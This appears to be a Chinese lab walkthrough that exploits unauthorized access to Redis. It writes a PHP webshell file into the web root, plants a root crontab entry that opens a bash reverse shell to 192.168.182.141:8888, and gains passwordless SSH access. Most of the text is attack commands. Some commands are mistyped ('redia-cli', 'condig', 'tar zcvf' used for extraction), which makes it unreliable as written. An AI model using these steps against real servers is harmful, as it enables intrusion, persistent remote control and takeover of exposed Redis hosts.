一、准备阶段
(一)、安装redis
1.下载redis
wget http://download.redis.io/releases/redis-4.0.9.tar.gz
2.解压压缩包
tar zcvf redis-4.0.9.tar.gz
3.将解压的redis移动到/usr/local/redis
mv redis-4.0.9 /usr/local/redis
4.到redis文件下编译,编译需要一段时间
cd /usr/local/redis/redis-4.0.9
make
编译完成
5.安装redis
make install
6.启动redis
redis-server redis
(二)、kali启动apache
1.启动apache
/etc/init.d/apache2 start 或者 systemctl restart apache2
2.用来检查apache是否启动
/etc/init.d/apache2 status 或者 systemctl status apache2
二、redis未授权访问 webshell(通过redis在目录下写入自己需要的文件)
redia-cli config set /var/www/html
redis-cli condig set dbfilename test.php
redis-cli set test "<?php phpinfo(); ?>"
redis-cli save
文件被成功写入
三、crontab写定时任务
1.kali监听端口,之后获得反弹的shell
nc -lvvp 8888
2.通过redis将需要的定时任务写入,用来反弹连接
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.182.141/8888 0>&1\n\n" | redis-cli -x set 1
redis-cli config set dir /var/spool/cron
redis-cli config set dbfilename root
redis-cli save
四、SSH免密
1.通过redis远程连接执行命令
redis-cli -h 192.168.182.141 -p 6379
2.靶机已经有了我的公钥,(公钥名字要正确)
3.kali可以免密登录